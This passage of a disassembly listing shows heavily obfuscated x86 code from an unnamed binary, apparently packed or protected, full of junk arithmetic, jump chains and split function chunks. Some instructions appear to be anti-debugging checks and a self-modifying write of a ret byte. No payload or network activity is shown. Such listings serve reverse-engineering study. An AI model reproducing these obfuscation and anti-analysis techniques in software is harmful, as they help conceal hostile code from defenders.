		sub	al, 99h
		push	6CA60CCAh
		adc	edx, 594956FAh
		jmp	loc_452102
; END OF FUNCTION CHUNK	FOR sub_45136B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45ADEC

loc_4439CB:				; CODE XREF: sub_45ADEC-8B44j
		jnz	loc_44D136
		jmp	loc_443D66
; END OF FUNCTION CHUNK	FOR sub_45ADEC
; ---------------------------------------------------------------------------

loc_4439D6:				; CODE XREF: y2kk37jd:loc_4442A4j
		adc	edx, esi
		jo	sub_43C054
		sub	ebp, 87206C5Bh
		rol	ebp, 10h
		and	ebx, esi
		jmp	loc_43C738

; =============== S U B	R O U T	I N E =======================================



sub_4439EE	proc near		; CODE XREF: sub_44F6F8-13876j

; FUNCTION CHUNK AT 0043F20F SIZE 00000017 BYTES
; FUNCTION CHUNK AT 00445C20 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044DBEC SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004561C7 SIZE 0000000F BYTES

		push	ebx
		push	682B32E5h
		pop	ebx
		sub	ebx, 597619A9h
		and	ebx, 8BE6B855h
		cmp	ebx, 80DCD70Eh
		jmp	loc_44DBEC
sub_4439EE	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453867

loc_443A0C:				; CODE XREF: sub_453867-2AB2j
		jnz	loc_43DF5B
		jmp	loc_43D5D3
; END OF FUNCTION CHUNK	FOR sub_453867
; ---------------------------------------------------------------------------

loc_443A17:				; CODE XREF: y2kk37jd:004440EAj
		push	edi
		adc	edx, ebx

loc_443A1A:				; CODE XREF: y2kk37jd:loc_44DFE9j
		call	sub_45405E
		push	26ED4E3Dh
		pop	edx
		jmp	loc_44E14A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456990

loc_443A2A:				; CODE XREF: sub_456990:loc_4432C2j
		jnz	loc_44397B
; END OF FUNCTION CHUNK	FOR sub_456990
; START	OF FUNCTION CHUNK FOR sub_447E3E

loc_443A30:				; CODE XREF: sub_447E3E:loc_447E48j
		jmp	loc_45B9EE
; END OF FUNCTION CHUNK	FOR sub_447E3E
; ---------------------------------------------------------------------------
		shl	edi, 1Dh
		or	edi, 0A957AFB9h
		sub	esi, 0F6CF8AF7h
		jo	loc_43E338
		jmp	loc_45684F
; ---------------------------------------------------------------------------
		ror	edi, 5
		jmp	loc_44145A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45689F

loc_443A57:				; CODE XREF: sub_45689F+1F7j
		cdq

loc_443A58:				; CODE XREF: sub_45689F:loc_441818j
		push	2B709867h
		add	eax, ecx
		jmp	loc_456261
; END OF FUNCTION CHUNK	FOR sub_45689F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453867

loc_443A64:				; CODE XREF: sub_453867:loc_43C065j
		jl	loc_456E8A

loc_443A6A:				; CODE XREF: sub_4429DD-94j
		jmp	loc_43E2C5
; END OF FUNCTION CHUNK	FOR sub_453867
; ---------------------------------------------------------------------------
		or	edx, 80D88A40h
		js	loc_44062B
		jmp	loc_456E88
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4514DE

loc_443A80:				; CODE XREF: sub_4514DE:loc_44F9ACj
		mov	edx, eax
		xchg	edx, [esp+0Ch+var_C]
		mov	eax, edx
		push	ecx
		push	96EFE0A8h
		pop	ecx
		rol	ecx, 13h
		jmp	loc_456E35
; END OF FUNCTION CHUNK	FOR sub_4514DE
; ---------------------------------------------------------------------------
		jnp	loc_45A5E5
		jmp	sub_44B7DB
; ---------------------------------------------------------------------------

loc_443AA1:				; CODE XREF: y2kk37jd:0043BD30j
		sbb	ecx, 4E0CDAA5h

; =============== S U B	R O U T	I N E =======================================



sub_443AA7	proc near		; CODE XREF: sub_43C326:loc_45B2B9p

; FUNCTION CHUNK AT 0043B83D SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0043D0EE SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043DA29 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 0043E3A4 SIZE 0000001F BYTES
; FUNCTION CHUNK AT 0043FC4E SIZE 00000021 BYTES
; FUNCTION CHUNK AT 004409BF SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00440F77 SIZE 00000024 BYTES
; FUNCTION CHUNK AT 00443F2A SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0044751B SIZE 00000023 BYTES
; FUNCTION CHUNK AT 004481CC SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00448FFD SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044ECC3 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044FB97 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00457AC6 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00458E84 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004596E3 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 00459CD3 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0045A347 SIZE 0000001B BYTES
; FUNCTION CHUNK AT 0045AD17 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0045C5B1 SIZE 00000005 BYTES

		xchg	ecx, [esp+0]
		pop	ecx

loc_443AAB:				; CODE XREF: sub_44CF09-3E12j
		sub	al, 99h

loc_443AAD:				; CODE XREF: sub_4448E2:loc_450943j
		call	sub_44CF09

loc_443AB2:				; CODE XREF: sub_459763+Ej
		mov	eax, large fs:20h
		or	eax, eax

loc_443ABB:				; CODE XREF: y2kk37jd:loc_44D5E7j
		jz	loc_43DA29
		jmp	loc_4481CC
sub_443AA7	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		sub	edx, 516364FCh
		jmp	sub_457DD3
; ---------------------------------------------------------------------------

loc_443AD1:				; DATA XREF: y2kk37jd:loc_44778Do
		call	sub_440CD1
		push	eax
		ror	eax, 16h
		mov	ds:dword_446BD0, eax
		jmp	locret_447D0A
; ---------------------------------------------------------------------------

loc_443AE5:				; CODE XREF: y2kk37jd:0043C92Ej
		mov	byte ptr [eax],	0C3h
		jmp	loc_457F62

; =============== S U B	R O U T	I N E =======================================



sub_443AED	proc near		; CODE XREF: sub_405E8A+1Bp
					; sub_405E8A+45p ...
		call	sub_443AFD
		jmp	ds:off_41E16C
sub_443AED	endp

; ---------------------------------------------------------------------------

loc_443AF8:				; CODE XREF: y2kk37jd:0044A7AEj
		jmp	locret_44F414

; =============== S U B	R O U T	I N E =======================================



sub_443AFD	proc near		; CODE XREF: sub_44516F:loc_43FAEBj
					; sub_443AEDp ...

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 00441495 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 00450C83 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 00453DD3 SIZE 00000019 BYTES
; FUNCTION CHUNK AT 00455FAC SIZE 00000005 BYTES

		pop	edx

loc_443AFE:				; CODE XREF: y2kk37jd:loc_43E5B3j
		jmp	loc_450C83
sub_443AFD	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

locret_443B03:				; CODE XREF: y2kk37jd:00442B65j
		retn
; ---------------------------------------------------------------------------
		add	edx, 95A54332h
		or	edx, ds:4000F3h
		add	edx, 0A94E7EBFh
		mov	edx, [edx]
		call	sub_454B16
; START	OF FUNCTION CHUNK FOR sub_44594E

loc_443B1D:				; CODE XREF: sub_44594E+B20Cj
		jmp	loc_44BD33
; END OF FUNCTION CHUNK	FOR sub_44594E
; ---------------------------------------------------------------------------
		push	0C8502F99h
		pop	eax
		xor	eax, 5087FCACh
		or	eax, 0D977998Ch
		jmp	loc_449EA3
; ---------------------------------------------------------------------------

loc_443B39:				; CODE XREF: y2kk37jd:loc_443EDBj
		and	esi, 9FD035B4h
		add	esi, 64B443C0h
		mov	[esi], eax
		pop	esi
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_393. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451C21

loc_443B49:				; CODE XREF: sub_451C21+13j
		jmp	loc_44D4CA
; END OF FUNCTION CHUNK	FOR sub_451C21
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451464

loc_443B4E:				; CODE XREF: sub_451464-14DE5j
					; sub_44A326+Aj
		push	offset loc_44304F
		jmp	loc_45A7DC
; END OF FUNCTION CHUNK	FOR sub_451464
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4465C3

loc_443B58:				; CODE XREF: sub_4465C3:loc_44C1A8j
		jz	loc_455CCB
		jmp	loc_459BF7
; END OF FUNCTION CHUNK	FOR sub_4465C3
; ---------------------------------------------------------------------------
		cmp	eax, 7D6DDDCDh
		jmp	loc_4592B2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448700

loc_443B6E:				; CODE XREF: sub_448700+63CFj
		pushf
		sub	ebx, esi

loc_443B71:				; CODE XREF: sub_448700:loc_44C851j
		mov	eax, [ebp-14h]
		mov	eax, [eax+64h]
		add	eax, [ebp-18h]
		push	ebx
		push	33992498h
		pop	ebx
		jmp	loc_458650
; END OF FUNCTION CHUNK	FOR sub_448700

; =============== S U B	R O U T	I N E =======================================



sub_443B86	proc near		; CODE XREF: sub_43F285+3p
					; y2kk37jd:00457B43j

; FUNCTION CHUNK AT 004507EC SIZE 00000005 BYTES

		xchg	edi, [esp+0]
		pop	edi
		mov	edx, ebp
		pop	ebp
		add	eax, 0CE1746C1h
		xor	eax, 0C9DC29D8h
		sub	eax, 0CE6505ABh
		rol	eax, 1Ch
		jmp	loc_4507EC
sub_443B86	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_443BA7:				; DATA XREF: sub_43BB55+1F572o
		xchg	edi, [esp]
		jmp	sub_447977

; =============== S U B	R O U T	I N E =======================================



sub_443BAF	proc near		; CODE XREF: sub_4548FB:loc_43D9A5j

var_14		= dword	ptr -14h
var_8		= dword	ptr -8
var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0043B35D SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043BECC SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043D316 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0043F660 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 004401B4 SIZE 0000001C BYTES
; FUNCTION CHUNK AT 0044032D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00440E37 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 00441990 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004420FD SIZE 0000001E BYTES
; FUNCTION CHUNK AT 004436DB SIZE 00000002 BYTES
; FUNCTION CHUNK AT 00443870 SIZE 00000023 BYTES
; FUNCTION CHUNK AT 00444BDA SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00445068 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 004450EF SIZE 00000014 BYTES
; FUNCTION CHUNK AT 004462A0 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 004462D1 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0044A288 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0044C5D3 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044E6CE SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0045040F SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00451FBC SIZE 0000000F BYTES
; FUNCTION CHUNK AT 00452519 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00452ACF SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00452D40 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00454BDE SIZE 00000018 BYTES
; FUNCTION CHUNK AT 00457B48 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00458002 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 00459AC8 SIZE 00000016 BYTES

		push	ebx
		push	1C1F4665h
		xchg	eax, [esp+14h+var_14]
		mov	ebx, eax
		pop	eax
		and	ebx, 0F8D08B1Eh
		add	ebx, 0A72A0045h
		sub	ebx, 18B1E02Eh
		jmp	loc_45040F
sub_443BAF	endp ; sp-analysis failed

; [00000001 BYTES: COLLAPSED FUNCTION nullsub_100. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4440AB

loc_443BD3:				; CODE XREF: sub_4440AB+15E3Aj
		jmp	loc_44AE57
; END OF FUNCTION CHUNK	FOR sub_4440AB
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4595D8

loc_443BD8:				; CODE XREF: sub_4595D8+11j
		jmp	loc_440D4B
; END OF FUNCTION CHUNK	FOR sub_4595D8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45024B

loc_443BDD:				; CODE XREF: sub_45024B-782Dj
		jmp	loc_43F472
; END OF FUNCTION CHUNK	FOR sub_45024B
; ---------------------------------------------------------------------------
		jnz	loc_442D31
		jmp	sub_44B8EE
; ---------------------------------------------------------------------------

loc_443BED:				; DATA XREF: y2kk37jd:loc_4488F2o
		pushf
		push	84ED964Ch
		pop	ecx
		sub	ecx, ds:4000F2h
		jnz	loc_43B3E8

loc_443C00:				; CODE XREF: y2kk37jd:00458DB2j
		jmp	loc_448EC4
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_457AA8

loc_443C05:				; CODE XREF: sub_457AA8+Dj
		jmp	loc_453EBE
; END OF FUNCTION CHUNK	FOR sub_457AA8
; ---------------------------------------------------------------------------
		add	edi, esi
		jmp	loc_43B3E6
; ---------------------------------------------------------------------------
		xor	ecx, ebp
		jmp	sub_444A2B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4448E2

loc_443C18:				; CODE XREF: sub_4448E2+5F2Dj
		jp	loc_447FCD
; END OF FUNCTION CHUNK	FOR sub_4448E2
; START	OF FUNCTION CHUNK FOR sub_445568

loc_443C1E:				; CODE XREF: sub_445568:loc_450C2Dj
		not	ebp

loc_443C20:				; CODE XREF: sub_4448E2:loc_453208j
		lea	eax, [ebp-2AAh]
		cmp	dword ptr [eax], 47424454h
		jz	loc_44D915
		jmp	loc_45B229
; END OF FUNCTION CHUNK	FOR sub_445568
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_370. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B924

loc_443C38:				; CODE XREF: sub_44B924+36FEj
		jmp	loc_43E265
; END OF FUNCTION CHUNK	FOR sub_44B924
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E1E9

loc_443C3D:				; CODE XREF: sub_43E1E9+EFA0j
		jmp	sub_440CD1
; END OF FUNCTION CHUNK	FOR sub_43E1E9
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_452C0C

loc_443C42:				; CODE XREF: sub_452C0C-13BBCj
		jmp	nullsub_207
; END OF FUNCTION CHUNK	FOR sub_452C0C
; ---------------------------------------------------------------------------

locret_443C47:				; CODE XREF: y2kk37jd:00446F12j
		retn
; ---------------------------------------------------------------------------

loc_443C48:				; CODE XREF: y2kk37jd:0045BF59j
		jmp	loc_43FE46
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F2F2

loc_443C4D:				; CODE XREF: sub_43F2F2-27CBj
		jmp	loc_45B958
; END OF FUNCTION CHUNK	FOR sub_43F2F2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4492F7

loc_443C52:				; CODE XREF: sub_4492F7-630Dj
		popf
		jge	loc_44241D
		ror	edi, 1Ch
		jmp	loc_44D90C
; END OF FUNCTION CHUNK	FOR sub_4492F7
; ---------------------------------------------------------------------------

loc_443C61:				; CODE XREF: y2kk37jd:0044E513j
		sub	ebx, edi
		pop	edi
		mov	eax, edx
		push	eax
		push	2F929776h
		jmp	loc_44B024
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4415B8

loc_443C71:				; CODE XREF: sub_4415B8:loc_44A2B5j
		add	eax, ebp
		add	eax, 2788CEB3h
		push	eax
		push	eax
		push	5BACFC7Eh
		pop	eax
		xor	eax, 879A0FDBh
		sub	eax, 2D99CD01h
		jmp	loc_456ADE
; END OF FUNCTION CHUNK	FOR sub_4415B8

; =============== S U B	R O U T	I N E =======================================



sub_443C92	proc near		; DATA XREF: sub_43ED86+27EFo
		push	edx
		pushf
		push	5BF4A972h
		pop	edx
		sub	edx, 0B93B091h
sub_443C92	endp ; sp-analysis failed

; START	OF FUNCTION CHUNK FOR sub_43C851

loc_443CA0:				; CODE XREF: sub_43C851-BD7j
		rol	edx, 2
		jmp	loc_4597DF
; END OF FUNCTION CHUNK	FOR sub_43C851
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43ED19

loc_443CA8:				; CODE XREF: sub_43ED19+7D7Dj
		jz	loc_4564DB
		mov	[ebx], eax
		or	eax, edi
		test	ebp, edi
		jmp	loc_4564CF
; END OF FUNCTION CHUNK	FOR sub_43ED19
; ---------------------------------------------------------------------------

loc_443CB9:				; CODE XREF: y2kk37jd:00442DD0j
		rol	esi, 0Bh
		add	esi, 0DF333213h
		xchg	esi, [esp]
		jmp	loc_450456
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453093

loc_443CCA:				; CODE XREF: sub_453093+Dj
		call	sub_449DAB

loc_443CCF:				; CODE XREF: sub_4552EB-20F9j
		jmp	loc_444B0F
; END OF FUNCTION CHUNK	FOR sub_453093
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445083

loc_443CD4:				; CODE XREF: sub_445083-6165j
		jmp	loc_449E0C
; END OF FUNCTION CHUNK	FOR sub_445083
; ---------------------------------------------------------------------------

locret_443CD9:				; CODE XREF: y2kk37jd:0044147Bj
		retn
; ---------------------------------------------------------------------------

loc_443CDA:				; CODE XREF: y2kk37jd:00458636j
		jmp	loc_44C3FF
; ---------------------------------------------------------------------------

loc_443CDF:				; CODE XREF: y2kk37jd:loc_457EE8j
		jz	loc_45654E
; START	OF FUNCTION CHUNK FOR sub_449C4F

loc_443CE5:				; CODE XREF: sub_449C4F+98Aj
		jmp	loc_44EA97
; END OF FUNCTION CHUNK	FOR sub_449C4F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445226

loc_443CEA:				; CODE XREF: sub_445226+1B4Fj
		jmp	loc_44D906
; END OF FUNCTION CHUNK	FOR sub_445226
; ---------------------------------------------------------------------------
		cmp	ebp, 4B6519B9h
		jmp	loc_44DE11
; ---------------------------------------------------------------------------

loc_443CFA:				; CODE XREF: y2kk37jd:0043C128j
		ror	ecx, 5

loc_443CFD:				; CODE XREF: y2kk37jd:0043C11Cj
		or	esi, 3E13F6D5h
		rol	esi, 19h
		push	offset loc_455FDC
		jmp	locret_454884
; ---------------------------------------------------------------------------

loc_443D10:				; CODE XREF: y2kk37jd:00453E25j
		mov	[ebx], ecx
; START	OF FUNCTION CHUNK FOR sub_4458DD

loc_443D12:				; CODE XREF: sub_4458DD+E53Bj
		or	ecx, 0EFB203DDh

loc_443D18:				; CODE XREF: sub_45B7AA:loc_45B84Ej
		add	ecx, 105050A9h
		mov	[ecx], eax
		pop	ecx

loc_443D21:				; CODE XREF: sub_4458DD+29E1j
					; sub_4458DD+3083j
		push	esi
		push	9C61D7D2h
		jmp	loc_451B49
; END OF FUNCTION CHUNK	FOR sub_4458DD
; ---------------------------------------------------------------------------
		jmp	ds:off_41E070
; ---------------------------------------------------------------------------

loc_443D32:				; CODE XREF: y2kk37jd:00450324j
		jmp	loc_44BAE5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45B7AA

loc_443D37:				; CODE XREF: sub_45B7AA-1BD23j
		jmp	loc_44B88B
; END OF FUNCTION CHUNK	FOR sub_45B7AA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44610D

loc_443D3C:				; CODE XREF: sub_44610D-7D90j
					; sub_44610D-3FB4j ...
		jnb	loc_4418CE
		pop	edx
		mov	eax, [esp-4+arg_0]
		push	ebx
		jmp	loc_442292
; END OF FUNCTION CHUNK	FOR sub_44610D
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_330. PRESS KEYPAD	"+" TO EXPAND]

; =============== S U B	R O U T	I N E =======================================



sub_443D4D	proc near		; DATA XREF: sub_43B2FD:loc_45A7EDo

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0045C692 SIZE 00000012 BYTES

		call	sub_440CD1
		push	edi
		mov	edi, eax
		xchg	edi, [esp+4+var_4]
		ror	eax, 1Ch
		jmp	loc_45C692
sub_443D4D	endp

; [00000001 BYTES: COLLAPSED FUNCTION nullsub_465. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44AD49

loc_443D61:				; CODE XREF: sub_44AD49-EE92j
		jmp	loc_4421F1
; END OF FUNCTION CHUNK	FOR sub_44AD49
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45ADEC

loc_443D66:				; CODE XREF: sub_45ADEC-1741Bj
		jnz	loc_451E2F
		jmp	loc_44D123
; END OF FUNCTION CHUNK	FOR sub_45ADEC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F346

loc_443D71:				; CODE XREF: y2kk37jd:loc_44102Bj
					; sub_43F346+D074j
		jns	loc_447E48
		cmp	ebx, eax
		jmp	loc_446A58
; END OF FUNCTION CHUNK	FOR sub_43F346
; ---------------------------------------------------------------------------

loc_443D7E:				; CODE XREF: y2kk37jd:00453723j
		cmp	ecx, 0F796E815h
; START	OF FUNCTION CHUNK FOR sub_456809

loc_443D84:				; CODE XREF: sub_456809:loc_43C0FDj
		jmp	loc_45A988
; END OF FUNCTION CHUNK	FOR sub_456809
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453867

loc_443D89:				; CODE XREF: sub_453867:loc_4524AAj
		jnz	loc_43CFF5
		jmp	loc_44B36F
; END OF FUNCTION CHUNK	FOR sub_453867
; ---------------------------------------------------------------------------

loc_443D94:				; CODE XREF: y2kk37jd:0043E0D3j
		rol	edx, 16h
		call	sub_444D46
; START	OF FUNCTION CHUNK FOR sub_4448E2

loc_443D9C:				; CODE XREF: sub_4448E2-2017j
		mov	[edx], ebx
		cmp	eax, ecx
		jmp	loc_44B27E
; END OF FUNCTION CHUNK	FOR sub_4448E2
; ---------------------------------------------------------------------------

loc_443DA5:				; CODE XREF: y2kk37jd:00448611j
		cmp	ecx, ebx
		jmp	loc_44209E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44107E

loc_443DAC:				; CODE XREF: sub_44107E+19085j
		jnz	loc_447E7E
		jmp	loc_45203D
; END OF FUNCTION CHUNK	FOR sub_44107E
; ---------------------------------------------------------------------------

loc_443DB7:				; CODE XREF: y2kk37jd:0043F2FFj
		push	ebp

; =============== S U B	R O U T	I N E =======================================



sub_443DB8	proc near		; CODE XREF: sub_45B7AA-74BCp

; FUNCTION CHUNK AT 0043EBE7 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 00453132 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045C3C7 SIZE 00000017 BYTES

		xchg	eax, [esp+0]
		pop	eax
		mov	edx, 64EFA9EDh
		jmp	loc_43EBE7
sub_443DB8	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4554E9

loc_443DC6:				; CODE XREF: y2kk37jd:004408EDj
					; sub_4554E9+191Aj
		mov	ecx, 0E53045A6h
		jmp	loc_445A20
; END OF FUNCTION CHUNK	FOR sub_4554E9
; ---------------------------------------------------------------------------
		mov	eax, 1171F650h
		push	edx
		push	0BAE2144h
		pop	edx
		jmp	loc_44369F

; =============== S U B	R O U T	I N E =======================================



sub_443DE1	proc near		; CODE XREF: y2kk37jd:0043E207j
					; y2kk37jd:00447F3Ep

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 00442138 SIZE 00000005 BYTES

		xchg	eax, [esp+0]
		pop	eax
		add	ecx, 8F577D5Fh
		xchg	ecx, [esp-4+arg_0]
		jmp	loc_442138
sub_443DE1	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445226

loc_443DF3:				; CODE XREF: sub_445226:loc_446BB5j
		rol	eax, 5
		sub	eax, 0BA36E81Eh
		add	eax, 6E832C13h
		push	edx
		jmp	loc_4408A2
; END OF FUNCTION CHUNK	FOR sub_445226
; ---------------------------------------------------------------------------
		adc	ebp, 0ACF2A1CCh
		jmp	loc_43F910
; ---------------------------------------------------------------------------

locret_443E13:				; CODE XREF: y2kk37jd:0045A2C9j
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446E19

loc_443E14:				; CODE XREF: y2kk37jd:00440B29j
					; sub_446E19:loc_45B297j
		mov	ebx, [edi]
; END OF FUNCTION CHUNK	FOR sub_446E19

; =============== S U B	R O U T	I N E =======================================



sub_443E16	proc near		; CODE XREF: y2kk37jd:0043B3F1p

; FUNCTION CHUNK AT 00441E5B SIZE 00000005 BYTES

		xchg	esi, [esp+0]
		pop	esi
		add	ecx, 959B8DBEh
		popf
		jmp	loc_441E5B
sub_443E16	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44753E

loc_443E26:				; CODE XREF: sub_44753E-8776j
		rol	ebp, 0Ah
		jbe	loc_43CBC3
		add	ebp, edi
		jmp	loc_43CC4C
; END OF FUNCTION CHUNK	FOR sub_44753E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_449E69

loc_443E36:				; CODE XREF: sub_449E69:loc_447E4Dj
					; sub_449E69+118D5j
		push	0FA7F48B6h
		pop	eax
		sub	eax, 7CF0B8C4h
		jmp	loc_457388
; END OF FUNCTION CHUNK	FOR sub_449E69
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4458DD

loc_443E47:				; CODE XREF: sub_4458DD:loc_444221j
					; y2kk37jd:00444238j
		rol	edi, 0Fh
		add	edi, 8DC32292h
		popf
		xchg	edi, [esp-8+arg_4]
		jmp	loc_4403B7
; END OF FUNCTION CHUNK	FOR sub_4458DD
; ---------------------------------------------------------------------------
		sbb	ecx, 0F0A76770h
		jmp	loc_447DBF
; ---------------------------------------------------------------------------

loc_443E64:				; CODE XREF: y2kk37jd:0043D046j
		jbe	loc_45A06E
		xchg	edx, [esi]
		jmp	loc_45AF8D
; ---------------------------------------------------------------------------

loc_443E71:				; CODE XREF: y2kk37jd:00451286j
		jnz	loc_43C738
		jmp	loc_4442A4
; ---------------------------------------------------------------------------
		mov	ebx, 5844B4A1h
		jmp	loc_44B114
; ---------------------------------------------------------------------------

loc_443E86:				; DATA XREF: sub_445787:loc_44DC5Do
		pop	edx
		mov	eax, [esp]
		push	edx
; START	OF FUNCTION CHUNK FOR sub_4577FE

loc_443E8B:				; CODE XREF: sub_4577FE:loc_4420BAj
		push	eax
		push	2DA02EA9h
		pop	eax
		sub	eax, 82799179h
		rol	eax, 0Bh

loc_443E9B:				; CODE XREF: sub_445568:loc_43E092j
		jmp	loc_43C5CF
; END OF FUNCTION CHUNK	FOR sub_4577FE

; =============== S U B	R O U T	I N E =======================================



sub_443EA0	proc near		; DATA XREF: y2kk37jd:0045B5E8o

; FUNCTION CHUNK AT 00459445 SIZE 00000005 BYTES

		xchg	esi, [esp+0]
		mov	ebp, esi
		pop	esi
		jmp	loc_459445
sub_443EA0	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_443EAB	proc near		; CODE XREF: sub_440EC8j

var_14		= dword	ptr -14h

; FUNCTION CHUNK AT 0043BFEA SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00440005 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 004430E8 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 00446D3E SIZE 0000001F BYTES
; FUNCTION CHUNK AT 0044BF08 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044E381 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00457959 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045AEEA SIZE 00000012 BYTES

		push	ebp
		mov	ebp, esp
		push	edx
		mov	edx, ecx
		call	sub_45609B

loc_443EB6:				; CODE XREF: y2kk37jd:0044C393j
		jmp	loc_446D3E
sub_443EAB	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4543EF

loc_443EBB:				; CODE XREF: sub_4543EF-17EADj
		jmp	nullsub_446
; END OF FUNCTION CHUNK	FOR sub_4543EF
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C2D9

loc_443EC0:				; CODE XREF: sub_43C2D9+11j
		push	eax
		call	sub_43BA66
		jmp	loc_44BA94
; END OF FUNCTION CHUNK	FOR sub_43C2D9

; =============== S U B	R O U T	I N E =======================================



sub_443ECB	proc near		; CODE XREF: sub_44884Dj

; FUNCTION CHUNK AT 0044AD9B SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0045A87C SIZE 0000000F BYTES

		push	ebp
		call	sub_4598BE

loc_443ED1:				; CODE XREF: sub_450B30+99F0j
		jmp	loc_44AD9B
sub_443ECB	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A2F9

loc_443ED6:				; CODE XREF: sub_45A2F9+1Cj
